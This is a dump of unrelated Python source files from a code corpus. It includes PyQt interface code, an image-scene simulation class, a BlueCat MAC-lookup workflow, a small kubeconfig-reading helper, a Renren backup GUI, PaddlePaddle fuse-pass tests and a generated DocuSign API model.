self.action_quit.setToolTip(_translate(\"main_application\", \"Close this application\", None))\n self.action_quit.setShortcut(_translate(\"main_application\", \"Ctrl+Q\", None))\n self.action_swap.setText(_translate(\"main_application\", \"Swap\", None))\n self.action_swap.setToolTip(_translate(\"main_application\", \"Swap two selected units\", None))\n self.action_collapse.setText(_translate(\"main_application\", \"Collapse\", None))\n self.action_collapse.setToolTip(_translate(\"main_application\", \"Collapse selected unit row(s)\", None))\n self.action_recalculate_mapping.setText(_translate(\"main_application\", \"Recalculate mapping...\", None))\n self.action_recalculate_mapping.setToolTip(_translate(\"main_application\", \"Try to find a mapping automatically\",\n None))\n self.action_save_as.setText(_translate(\"main_application\", \"Save project as...\", None))\n self.action_save_as.setToolTip(_translate(\"main_application\", \"Save project to a new file\", None))\n self.action_load_connector_map.setText(_translate(\"main_application\", \"Load connector map...\", None))\n self.action_zoom_in.setText(_translate(\"main_application\", \"Zoom in\", None))\n self.action_zoom_in.setToolTip(_translate(\"main_application\", \"Zoom overview in\", None))\n self.action_zoom_in.setShortcut(_translate(\"main_application\", \"Ctrl++\", None))\n self.action_zoom_out.setText(_translate(\"main_application\", \"Zoom out\", None))\n self.action_zoom_out.setToolTip(_translate(\"main_application\", \"Zoom overview out\", None))\n self.action_zoom_out.setShortcut(_translate(\"main_application\", \"Ctrl+-\", None))\n self.action_revert_mapping.setText(_translate(\"main_application\", \"Revert mapping...\", None))\n self.action_revert_mapping.setToolTip(_translate(\"main_application\", \"Revert current mapping to last saved\",\n None))\n self.action_collapse_overview.setText(_translate(\"main_application\", \"Collapse overview\", None))\n self.action_collapse_overview.setToolTip(_translate(\"main_application\", \"Decrease overview\\'s y range\", None))\n self.action_expand_overview.setText(_translate(\"main_application\", \"Expand overview\", None))\n self.action_expand_overview.setToolTip(_translate(\"main_application\", \"Increase overview\\'s y range\", None))\n self.action_preferences.setText(_translate(\"main_application\", \"Preferences\", None))\n self.action_preferences.setToolTip(_translate(\"main_application\", \"View and change preferences\", None))\n self.action_about.setText(_translate(\"main_application\", \"About\", None))\n self.action_about.setToolTip(_translate(\"main_application\", \"Information about SWAN\", None))\n self.action_tutorials.setText(_translate(\"main_application\", \"Tutorials\", None))\n self.action_export_to_csv.setText(_translate(\"main_application\", \"Export to CSV...\", None))\n self.action_export_to_odml.setText(_translate(\"main_application\", \"Export to odML...\", None))\n self.action_import_from_csv.setText(_translate(\"main_application\", \"Import from csv\", None))\n self.action_restore_state.setText(_translate(\"main_application\", \"Restore GUI state\", None))\n self.action_revert_state.setText(_translate(\"main_application\", \"Revert GUI state\", None))\n self.action_save_state.setText(_translate(\"main_application\", \"Save GUI state\", None))\n\n def load_icons(self):\n \"\"\"\n Loads the icons.\n \n \"\"\"\n try:\n prefix = \":\" + sep + \"icons\" + sep\n # File\n icon = QtGui.QIcon()\n icon.addPixmap(QtGui.QPixmap(prefix + \"new.png\"), 
QtGui.QIcon.Normal, QtGui.QIcon.Off)\n self.action_new_project.setIcon(icon)\n icon = QtGui.QIcon()\n icon.addPixmap(QtGui.QPixmap(prefix + \"open.png\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n self.action_load_project.setIcon(icon)\n icon = QtGui.QIcon()\n icon.addPixmap(QtGui.QPixmap(prefix + \"save.png\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n self.action_save_project.setIcon(icon)\n icon = QtGui.QIcon()\n icon.addPixmap(QtGui.QPixmap(prefix + \"save_as.png\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n self.action_save_as.setIcon(icon)\n # Edit\n icon = QtGui.QIcon()\n icon.addPixmap(QtGui.QPixmap(prefix + \"revert.png\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n self.action_revert_mapping.setIcon(icon)\n icon = QtGui.QIcon()\n icon.addPixmap(QtGui.QPixmap(prefix + \"swap.png\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n self.action_swap.setIcon(icon)\n icon = QtGui.QIcon()\n icon.addPixmap(QtGui.QPixmap(prefix + \"zoom_in.png\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n self.action_zoom_in.setIcon(icon)\n icon = QtGui.QIcon()\n icon.addPixmap(QtGui.QPixmap(prefix + \"zoom_out.png\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n self.action_zoom_out.setIcon(icon)\n icon = QtGui.QIcon()\n icon.addPixmap(QtGui.QPixmap(prefix + \"expand.png\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n self.action_expand_overview.setIcon(icon)\n icon = QtGui.QIcon()\n icon.addPixmap(QtGui.QPixmap(prefix + \"collapse.png\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n self.action_collapse_overview.setIcon(icon)\n icon = QtGui.QIcon()\n icon.addPixmap(QtGui.QPixmap(prefix + \"preferences.png\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n self.action_preferences.setIcon(icon)\n except Exception as e:\n print(\"Icon Exception: {exception}\".format(exception=e))\n pass\n"} {"ext": "py", "sha": "1a30bfa58394f6e7f42ba7213bc2f23010d0481f", "content": "# -*- coding: utf-8 -*-\n\"\"\"\nContainer for building a scene with fluorescent objects (i.e., scene plays a role of background or frame).\n\n@author: ssklykov\n\"\"\"\n# %% Imports\nimport numpy as np\nimport matplotlib.pyplot as plt\n# from skimage.util import img_as_ubyte\nimport os\nfrom skimage.io import imsave\nfrom scipy.ndimage import measurements\n\n\n# %% class definition\nclass u_scene():\n \"\"\"Class composing all capabilities of building image (numpy 2D array) with some objects drawn on the scene.\n The image commonly is designated as width x height (e.g., 800x600)\"\"\"\n\n # default values\n width = 100\n height = 100\n possible_img_types = ['uint8', 'uint16', 'float']\n image_type = 'uint8'\n scene_image = np.zeros((height, width), dtype=image_type)\n maxPixelValue = 255\n counter = 1 # counting how many images saved along generation\n centers_of_mass = []\n\n # %% Constructor\n def __init__(self, width: int, height: int, image_type: str = 'uint8'):\n \"\"\"\n Initialize the blank (dark) scene image with the specified type (800x600 8bit image as an example)\n\n Parameters\n ----------\n width : int\n Width of the initialized image (scene)\n height : int\n Height of the initialized image (scene)\n image_type : str, optional\n Image type used for pixel value calculations. 
Possible values are: 'uint8', 'uint16', 'float'.\n The default is 'uint8'.\n\n Returns\n -------\n None.\n\n \"\"\"\n width = abs(width)\n height = abs(height)\n if width > 0:\n self.width = width\n if height > 0:\n self.width = width\n if image_type in self.possible_img_types:\n self.image_type = image_type\n else:\n self.image_type = 'uint8'\n print(\"Image type hasn't been recognized, initialized default 8bit gray image\")\n if (width != 100) or (height != 100) or (image_type != 'uint8'):\n # non default values => re-initialization of the class attributes\n self.scene_image = np.zeros((height, width), dtype=self.image_type)\n self.width = width\n self.height = height\n if self.image_type == 'uint16':\n self.maxPixelValue = 65535\n elif self.image_type == 'float':\n self.maxPixelValue = 1.0 # According to the specification of scikit-image\n\n # %% Supportive functions\n def cast_pixels_sum(self, pixels_sum):\n \"\"\"\n Casting of input result of pixel summing to conform with data type of the used image.\n\n Parameters\n ----------\n pixels_sum : uint8, uint16 or float\n Sum of pixels (mask + scene (background)).\n\n Returns\n -------\n value_returned : uint8, uint16 or float\n Returns casted / corrected pixel value.\n\n \"\"\"\n if (pixels_sum) <= self.maxPixelValue:\n # additional conversion for insuring of conformity with data type\n if self.image_type == 'uint8':\n value_returned = np.uint8(pixels_sum)\n elif self.image_type == 'uint16':\n value_returned = np.uint16(pixels_sum)\n else:\n value_returned = float(pixels_sum)\n else:\n value_returned = self.maxPixelValue\n return value_returned\n\n def get_j_finish(self, j_start: int, nCols: int) -> int:\n \"\"\"\n Calculation of maximum j index for adding mask, preventing it to be for out of bounds.\n\n Parameters\n ----------\n j_start : int\n Starting index for filling mask in.\n nCols : int\n Number of columns in mask that should be added to the scene.\n\n Returns\n -------\n int\n Ending (\"final\") index j for filling mask into the scene.\n\n \"\"\"\n if ((j_start + nCols) < self.width): # checking that starting/ending of summing are not out of bounds\n j_finish = j_start + nCols\n else:\n j_finish = self.width\n return j_finish\n\n def get_i_finish(self, i_start: int, nRows: int) -> int:\n \"\"\"\n Calculation of maximum i index for adding mask, preventing it to be for out of bounds\n\n Parameters\n ----------\n i_start : int\n Starting index for filling mask in.\n nRows : int\n Number of columns in mask that should be added to the scene.\n\n Returns\n -------\n int\n Ending (\"final\") index j for filling mask into the scene.\n\n \"\"\"\n if ((i_start + nRows) < self.height): # checking that starting/ending of summing are not out of bounds\n i_finish = i_start + nRows\n else:\n i_finish = self.height\n return i_finish\n\n # %% Drawing of an object with some intensity mask (profile)\n def add_mask(self, i_start: int, j_start: int, mask, debug: bool = False):\n \"\"\"\n Adding the \"mask\" - representation of the object (basically, less than the scene (background) image).\n Contradictory, i_start represents \"y\" coordinate, j_start - \"x\", due to array representation of column and row.\n This function accepts coordinates of image origin - starting pixel for drawing (like zero pixel).\n The coordinates (j_start, i_start) as (x, y) could be negative or exceeding the scene sizes - in such case\n whenever it possible, only the part of an object image will be added.\n\n Parameters\n ----------\n i_start : int\n Start pixel (y 
coordinate) for drawing of an image (\"mask\").\n j_start : int\n Start pixel (x coordinate) for drawing of an image (\"mask\").\n mask : np.array\n 2D np.array (\"mask\") with pixel values which represent the object.\n debug: bool, optional\n Flag for saving some internal statistical values for checking of possible bugs during calculations.\n The default is False.\n\n Returns\n -------\n None.\n The scene collected as internal attribute of this class.\n\n \"\"\"\n (nRows, nCols) = np.shape(mask) # getting of sizes of mask\n\n # Below is checking that the mask is not empty, it should be 1x1 matrix at least\n if (nRows == 0) or (nCols == 0):\n raise(IndexError('Provided mask is empty along some of its axis'))\n\n # Below is checking that the i_start and j_start makes sense to apply to the scene image:\n # i_start and j_start could be negative, but at least 1 point should be added to a scene\n # also, j associates with WIDTH, so with # of columns! i - with rows!\n if ((i_start + nRows) < 1) or ((j_start + nCols) < 1):\n raise(IndexError('Provided i_start or j_start is not conformed with the mask sizes'))\n\n # Below is checking filling parameters (i_start, j_start) is laying on an scene image\n if (i_start >= self.height) or (j_start >= self.width):\n raise(IndexError(\"Starting indices for adding mask is out of scene image bounds\"))\n\n # i_start, j_start > 0 both, filling some mask into a scene image - basic check for conformity\n if (i_start >= 0) and (j_start >= 0) and (nRows > 0) and (nCols > 0):\n # Attempt to speed up the adding mask to a scene: transferring pixel values as chunk with rows\n if ((i_start + nRows) < self.height): # checking that fast sum over y axis could be performed\n i_finish = i_start + nRows\n j_finish = self.get_j_finish(j_start, nCols)\n\n # \"Fast summing\" - adding the whole rows (all columns) to the image (scene)\n for j in range(j_start, j_finish): # summing along j axis\n # checking the conformity with image type\n if np.max(self.scene_image[i_start:i_finish, j] + mask[:, j-j_start]) <= self.maxPixelValue:\n self.scene_image[i_start:i_finish, j] += mask[:, j-j_start] # fast adding mask to a scene\n else:\n # checking each pixel from a scene and added from a mask pixel to be in range with image type\n for i in range(i_start, i_finish):\n pixels_sum = self.scene_image[i, j] + mask[i-i_start, j-j_start]\n self.scene_image[i, j] = self.cast_pixels_sum(pixels_sum)\n\n # Attempt to speed up the adding mask to a scene: transferring pixel values as a chunk with columns\n elif ((j_start + nCols) < self.width): # checking that fast sum over i axis could be performed\n j_finish = j_start + nCols\n i_finish = self.get_i_finish(i_start, nRows)\n\n # \"Fast summing\" - along column - adding all rows at once\n for i in range(i_start, i_finish): # summing along j axis\n # checking the conformity with image type\n if np.max(self.scene_image[i, j_start:j_finish] + mask[i-i_start, :]) <= self.maxPixelValue:\n self.scene_image[i, j_start:j_finish] += mask[i-i_start, :] # fast adding mask to a scene\n else:\n # checking each pixel from a scene and added from a mask pixel to be in range with image type\n for j in range(j_start, j_finish):\n pixels_sum = self.scene_image[i, j] + mask[i-i_start, j-j_start]\n self.scene_image[i, j] = self.cast_pixels_sum(pixels_sum)\n\n # filling right upper corner with exceptional case - when mask is out of image bounds\n else:\n i_finish = self.height\n j_finish = self.width\n for i in range(i_start, i_finish):\n for j in range(j_start, 
j_finish):\n pixels_sum = self.scene_image[i, j] + mask[i-i_start, j-j_start]\n self.scene_image[i, j] = self.cast_pixels_sum(pixels_sum)\n\n # Making correction of i_start, j_start if some of them is negative for working with partial mask overlap\n if (i_start < 0) or (j_start < 0):\n i_mask_start = 0\n j_mask_start = 0\n if (i_start < 0):\n nRows += i_start # it will draw the mask if it partially overlaps with image boundaries\n i_mask_start = abs(i_start)\n i_start = 0\n if (j_start < 0):\n nCols += j_start\n j_mask_start = abs(j_start)\n j_start = 0\n i_finish = self.get_i_finish(i_start, nRows)\n j_finish = self.get_j_finish(j_start, nCols)\n for i in range(i_start, i_finish):\n for j in range(j_start, j_finish):\n pixels_sum = self.scene_image[i, j] + mask[i+i_mask_start, j+j_mask_start]\n self.scene_image[i, j] = self.cast_pixels_sum(pixels_sum)\n # HINT: below is controlling of simulation - calculation of center of mass of added mask (generated scene)\n if debug:\n (i_mass_center, j_mass_center) = measurements.center_of_mass(self.scene_image)\n self.centers_of_mass.append([i_mass_center, j_mass_center])\n # print([i_mass_center, j_mass_center])\n\n # %% Plotting the summurized image (scene) with all objects\n def plot_image(self):\n \"\"\"\n Plotting the self.scene composed with added masks (objects) / noise.\n\n Returns\n -------\n Plotted the scene (picture) on the separate window using matplotlib library\n\n \"\"\"\n plt.figure()\n # Below - representation according to the documentation:\n # plt.cm.gray - for representing gray values, aspect - for filling image values in a window\n # origin - for adjusting origin of pixels (0, 0), extent - regulation of axis values\n # extent = (-0.5, numcols-0.5, -0.5, numrows-0.5)) - for origin = 'lower' - documents\n plt.imshow(self.scene_image, cmap=plt.cm.gray, aspect='auto', origin='lower',\n extent=(0, self.width, 0, self.height))\n plt.tight_layout()\n\n # %% Clearing the scene\n def clear_scene(self):\n \"\"\"\n Clearing the scene (background) image by re-initialize it to zero values (completely dark).\n\n Returns\n -------\n None.\n\n \"\"\"\n self.scene_image = np.zeros((self.height, self.width), dtype=self.image_type)\n\n # %% Saving generated scene image\n def save_scene(self, base_extension: str = \"jpg\"):\n \"\"\"\n Saving the scene (image) with all collected masks (objects) on it.\n\n Parameters\n ----------\n base_extension : str, optional\n The base extension for saving images (like jpg, png, tiff, etc). The default is \"jpg\".\n\n Returns\n -------\n None.\n\n \"\"\"\n scriptFolder = os.getcwd()\n default_folder = \"tests\"\n path = os.path.join(scriptFolder, default_folder)\n # print(path)\n if not os.path.isdir(path):\n os.mkdir(path)\n if os.path.isdir(path):\n # print(path)\n base_name = str(self.counter) + \".\" + base_extension\n self.counter += 1\n path_for_bead = os.path.join(path, base_name)\n if base_extension == \"jpg\" or base_extension == \"jpeg\":\n imsave(path_for_bead, self.scene_image, quality=100)\n else:\n imsave(path_for_bead, self.scene_image)\n\n\n# %% Testing class methods / construction\nif __name__ == '__main__':\n uScene = u_scene(150, 150, 'uint8')\n mask = np.ones((20, 20), dtype='uint8')\n mask = mask[:, :]*256\n uScene.add_mask(40, 40, mask)\n uScene.add_mask(80, 80, mask)\n uScene.plot_image()\n uScene.save_scene()\n"} {"ext": "py", "sha": "1a30bfc6feaa706123bd93f8aa309ab181bc795f", "content": "# Copyright 2019 BlueCat Networks (USA) Inc. 
and its affiliates\n# -*- coding: utf-8 -*-\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n# By: BlueCat Networks\n# Date: 2021-11-10\n# Gateway Version: 18.10.2\n# Description: Confirm MAC Address Page\n\n# Various Flask framework items.\nfrom flask import url_for, redirect, render_template, flash, g\n\nfrom bluecat import route, util\nfrom bluecat.entity import Entity\nfrom bluecat.api_exception import PortalException\n\nimport config.default_config as config\nfrom main_app import app\n\nfrom .confirm_mac_address_form import get_resource_text\nfrom .confirm_mac_address_form import GenericFormTemplate\n\ndef get_configuration():\n configuration = None\n if g.user:\n configuration = g.user.get_api().get_configuration(config.default_configuration)\n return configuration\n\ndef get_mac_address(configuration, address):\n mac_addr = None\n try:\n mac_addr = configuration.get_mac_address(address)\n print(mac_addr)\n except PortalException:\n pass\n return mac_addr\n\n\n# The workflow name must be the first part of any endpoints defined in this file.\n# If you break this rule, you will trip up on other people's endpoint names and\n# chaos will ensue.\n@route(app, '/confirm_mac_address/confirm_mac_address_endpoint')\n@util.workflow_permission_required('confirm_mac_address_page')\n@util.exception_catcher\ndef confirm_mac_address_confirm_mac_address_page():\n form = GenericFormTemplate()\n configuration = get_configuration()\n return render_template(\n 'confirm_mac_address_page.html',\n form=form,\n text=get_resource_text(),\n options=g.user.get_options(),\n )\n\n@route(app, '/confirm_mac_address/form', methods=['POST'])\n@util.workflow_permission_required('confirm_mac_address_page')\n@util.exception_catcher\ndef confirm_mac_address_confirm_mac_address_page_form():\n form = GenericFormTemplate()\n configuration = get_configuration()\n text = get_resource_text()\n \n if form.validate_on_submit():\n mac_address = get_mac_address(configuration, form.mac_address.data)\n if mac_address is not None:\n mac_pool=mac_address.get_property('macPool')\n if mac_pool is None:\n mac_pool=text['nomacpool']\n flash(mac_address.get_address() + text['registered'] , 'succeed')\n flash('MAC Pool : ' + mac_pool, 'succeed')\n else:\n flash(form.mac_address.data + text['noregistered'], 'failed')\n \n # Put form processing code here\n g.user.logger.info('SUCCESS')\n return redirect(url_for('confirm_mac_addressconfirm_mac_address_confirm_mac_address_page'))\n else:\n g.user.logger.info('Form data was not valid.')\n return render_template(\n 'confirm_mac_address_page.html',\n form=form,\n text=text,\n options=g.user.get_options(),\n )\n"} {"ext": "py", "sha": "1a30c050f0c817ab25120d1c571880c40f48bd96", "content": "import yaml\nstream=file(\"/home/vagrant/.kube/config\", 'r')\nyml=yaml.load(stream)\nprint yml[\"clusters\"][0][\"cluster\"][\"certificate-authority-data\"]\n# print yaml.dump(yml)\n\n"} {"ext": "py", "sha": "1a30c0a56da2c2d1169f301507df66a8807945ff", "content": "import sys\nimport spider\nfrom spider_ui 
import Ui_Dialog, QtWidgets, QtGui\n\n\nclass SpiderDialog(QtWidgets.QDialog):\n def __init__(self, parent=None):\n super().__init__(parent)\n self.ui = Ui_Dialog()\n self.ui.setupUi(self)\n self.spider = spider.RenrenSpider()\n self.init_signals()\n if self.spider.is_login():\n self.ui.loginFrame.hide()\n self.ui.mainFrame.show()\n\n def init_signals(self):\n self.ui.loginBtn.clicked.connect(self.on_login)\n self.ui.startBtn.clicked.connect(self.on_start)\n self.ui.browserBtn.clicked.connect(self.on_browse_dir)\n\n def on_login(self):\n email = self.ui.emailInput.text()\n password = self.ui.passwordInput.text()\n remember = self.ui.rememberCkb.isChecked()\n icode = self.ui.iCodeInput.text()\n try:\n self.spider.login(email, password, icode, remember)\n except spider.iCodeRequired as e:\n self.show_icode()\n error = QtWidgets.QErrorMessage()\n error.showMessage(str(e))\n else:\n self.ui.loginFrame.hide()\n self.ui.mainFrame.show()\n\n def show_icode(self):\n with open('icode.jpg', 'wb') as f:\n f.write(self.spider.get_icode_image())\n icode_image = QtGui.QImage('icode.jpg')\n icode_pixmap = QtGui.QPixmap.fromImage(icode_image)\n self.ui.iCodeImg.setPixmap(icode_pixmap)\n self.ui.iCodeFrame.show()\n\n def on_start(self):\n self.spider.set_params(\n user_id=self.ui.userInput.text(),\n output_dir=self.ui.outputPathInput.text()\n )\n self.ui.progressFrame.show()\n self.spider.main(self)\n self.ui.label.setText(\"备份完成!\")\n\n def on_browse_dir(self):\n file_dialog = QtWidgets.QFileDialog()\n file_dialog.setFileMode(QtWidgets.QFileDialog.Directory)\n file_dialog.setOption(QtWidgets.QFileDialog.ShowDirsOnly)\n if file_dialog.exec_():\n self.ui.outputPathInput.setText(file_dialog.selectedFiles()[0])\n\n def progressbar(self, total: int, desc: str):\n ui = self.ui\n\n class ProgressBar(object):\n def __init__(self):\n self.current = 0.0\n ui.label.setText(desc)\n ui.progressBar.reset()\n\n def update(self, number: int = 1):\n self.current += number\n ui.progressBar.setValue(int(self.current / total * 100))\n\n return ProgressBar()\n\n\ndef main():\n app = QtWidgets.QApplication(sys.argv)\n dialog = SpiderDialog()\n dialog.show()\n sys.exit(app.exec_())\n\n\nif __name__ == \"__main__\":\n main()\n"} {"ext": "py", "sha": "1a30c0f2d3d98f4ad9810b94a3b7c29586620c71", "content": "# Copyright (c) 2020 PaddlePaddle Authors. 
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Test for fusion of fc and activation.\"\"\"\nfrom __future__ import print_function\n\nimport unittest\nimport numpy as np\n\nimport paddle.fluid as fluid\nfrom inference_pass_test import InferencePassTest\nfrom paddle import enable_static\nfrom paddle.fluid.core import PassVersionChecker\n\nenable_static()\n\n\nclass FCGeluTanhOneDnnFusePassTest(InferencePassTest):\n\n def setUp(self):\n self.set_params()\n with fluid.program_guard(self.main_program, self.startup_program):\n data = fluid.data(name=\"data\",\n shape=[-1, 128, 768],\n dtype=\"float32\")\n fc_out = fluid.layers.fc(input=data, size=3072, num_flatten_dims=2)\n gelu_out = fluid.layers.gelu(fc_out, approximate=False)\n\n self.feeds = {\"data\": np.random.random((1, 128, 768)).astype(\"float32\")}\n\n self.fetch_list = [gelu_out]\n self.enable_mkldnn = True\n\n def set_params(self):\n self.pass_name = \"fc_act_mkldnn_fuse_pass\"\n\n def test_check_output(self):\n self.check_output()\n\n\nclass FCGeluErfOneDnnFusePassTest(InferencePassTest):\n\n def setUp(self):\n self.set_params()\n with fluid.program_guard(self.main_program, self.startup_program):\n data = fluid.data(name=\"data\",\n shape=[-1, 128, 768],\n dtype=\"float32\")\n fc_out = fluid.layers.fc(input=data, size=3072, num_flatten_dims=2)\n gelu_out = fluid.layers.gelu(fc_out, approximate=True)\n\n self.feeds = {\"data\": np.random.random((1, 128, 768)).astype(\"float32\")}\n\n self.fetch_list = [gelu_out]\n self.enable_mkldnn = True\n\n def set_params(self):\n self.pass_name = \"fc_act_mkldnn_fuse_pass\"\n\n def test_check_output(self):\n self.check_output()\n self.assertTrue(PassVersionChecker.IsCompatible(self.pass_name))\n\n\nclass FCTanhOneDnnFusePassTest(InferencePassTest):\n\n def setUp(self):\n self.set_params()\n with fluid.program_guard(self.main_program, self.startup_program):\n data = fluid.data(name=\"data\",\n shape=[-1, 128, 768],\n dtype=\"float32\")\n fc_out = fluid.layers.fc(input=data, size=3072, num_flatten_dims=2)\n tanh_out = fluid.layers.tanh(fc_out)\n\n self.feeds = {\"data\": np.random.random((1, 128, 768)).astype(\"float32\")}\n\n self.fetch_list = [tanh_out]\n self.enable_mkldnn = True\n\n def set_params(self):\n self.pass_name = \"fc_act_mkldnn_fuse_pass\"\n\n def test_check_output(self):\n self.check_output()\n self.assertTrue(PassVersionChecker.IsCompatible(self.pass_name))\n\n\nclass FCSigmoidOneDnnFusePassTest(InferencePassTest):\n\n def setUp(self):\n self.set_params()\n with fluid.program_guard(self.main_program, self.startup_program):\n data = fluid.data(name=\"data\",\n shape=[-1, 128, 768],\n dtype=\"float32\")\n fc_out = fluid.layers.fc(input=data, size=3072, num_flatten_dims=2)\n sigmoid_out = fluid.layers.sigmoid(fc_out)\n\n self.feeds = {\"data\": np.random.random((1, 128, 768)).astype(\"float32\")}\n\n self.fetch_list = [sigmoid_out]\n self.enable_mkldnn = True\n\n def set_params(self):\n self.pass_name = \"fc_act_mkldnn_fuse_pass\"\n\n def 
test_check_output(self):\n self.check_output()\n self.assertTrue(PassVersionChecker.IsCompatible(self.pass_name))\n\n\nclass FCHardSwishOneDnnFusePassTest(InferencePassTest):\n\n def setUp(self):\n self.set_params()\n with fluid.program_guard(self.main_program, self.startup_program):\n data = fluid.data(name=\"data\",\n shape=[-1, 128, 768],\n dtype=\"float32\")\n fc_out = fluid.layers.fc(input=data, size=3072, num_flatten_dims=2)\n hardswish_out = fluid.layers.hard_swish(fc_out)\n\n self.feeds = {\"data\": np.random.random((1, 128, 768)).astype(\"float32\")}\n\n self.fetch_list = [hardswish_out]\n self.enable_mkldnn = True\n\n def set_params(self):\n self.pass_name = \"fc_act_mkldnn_fuse_pass\"\n\n def test_check_output(self):\n self.check_output()\n self.assertTrue(PassVersionChecker.IsCompatible(self.pass_name))\n\n\nclass FCMishOneDnnFusePassTest(InferencePassTest):\n\n def setUp(self):\n self.set_params()\n with fluid.program_guard(self.main_program, self.startup_program):\n data = fluid.data(name=\"data\",\n shape=[-1, 128, 768],\n dtype=\"float32\")\n fc_out = fluid.layers.fc(input=data, size=3072, num_flatten_dims=2)\n mish_out = fluid.layers.mish(fc_out)\n\n self.feeds = {\"data\": np.random.random((1, 128, 768)).astype(\"float32\")}\n\n self.fetch_list = [mish_out]\n self.enable_mkldnn = True\n\n def set_params(self):\n self.pass_name = \"fc_act_mkldnn_fuse_pass\"\n\n def test_check_output(self):\n self.check_output()\n self.assertTrue(PassVersionChecker.IsCompatible(self.pass_name))\n\n\nif __name__ == \"__main__\":\n unittest.main()\n"} {"ext": "py", "sha": "1a30c2711a6a007426cc1ca55a5fdbb26572d1d2", "content": "# coding: utf-8\n\n\"\"\"\n DocuSign Click API\n\n DocuSign Click lets you capture consent to standard agreement terms with a single click: terms and conditions, terms of service, terms of use, privacy policies, and more. The Click API lets you include this customizable clickwrap solution in your DocuSign integrations. # noqa: E501\n\n OpenAPI spec version: v1\n Contact: devcenter@docusign.com\n Generated by: https://github.com/swagger-api/swagger-codegen.git\n\"\"\"\n\n\nimport pprint\nimport re # noqa: F401\n\nimport six\n\n\nclass ServiceVersion(object):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n\n \"\"\"\n Attributes:\n swagger_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n swagger_types = {\n 'version': 'str',\n 'version_url': 'str'\n }\n\n attribute_map = {\n 'version': 'version',\n 'version_url': 'versionUrl'\n }\n\n def __init__(self, version=None, version_url=None): # noqa: E501\n \"\"\"ServiceVersion - a model defined in Swagger\"\"\" # noqa: E501\n\n self._version = None\n self._version_url = None\n self.discriminator = None\n\n if version is not None:\n self.version = version\n if version_url is not None:\n self.version_url = version_url\n\n @property\n def version(self):\n \"\"\"Gets the version of this ServiceVersion. # noqa: E501\n\n # noqa: E501\n\n :return: The version of this ServiceVersion. # noqa: E501\n :rtype: str\n \"\"\"\n return self._version\n\n @version.setter\n def version(self, version):\n \"\"\"Sets the version of this ServiceVersion.\n\n # noqa: E501\n\n :param version: The version of this ServiceVersion. 
# noqa: E501\n :type: str\n \"\"\"\n\n self._version = version\n\n @property\n def version_url(self):\n \"\"\"Gets the version_url of this ServiceVersion. # noqa: E501\n\n # noqa: E501\n\n :return: The version_url of this ServiceVersion. # noqa: E501\n :rtype: str\n \"\"\"\n return self._version_url\n\n @version_url.setter\n def version_url(self, version_url):\n \"\"\"Sets the version_url of this ServiceVersion.\n\n # noqa: E501\n\n :param version_url: The version_url of this ServiceVersion. # noqa: E501\n :type: str\n \"\"\"\n\n self._version_url = version_url\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.swagger_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n if issubclass(ServiceVersion, dict):\n for key, value in self.items():\n result[key] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, ServiceVersion):\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n return not self == other\n"} {"ext": "py", "sha": "1a30c2ce3f7cd935e1807d6df0a90a33ebfc7ff3", "content": "###############################################################################\n# Copyright Keith Butler(2014) #\n# #\n# This file MacroDensity.density_tools.py is free software: you can #\n# redistribute it and/or modify it under the terms of the GNU General Public #\n# License as published by the Free Software Foundation, either version 3 of #\n# the License, or (at your option) any later version. #\n# This program is distributed in the hope that it will be useful, but WITHOUT #\n# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or #\n# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for #\n# more details. #\n# You should have received a copy of the GNU General Public License along with#\n# this program. If not, see <http://www.gnu.org/licenses/>. 
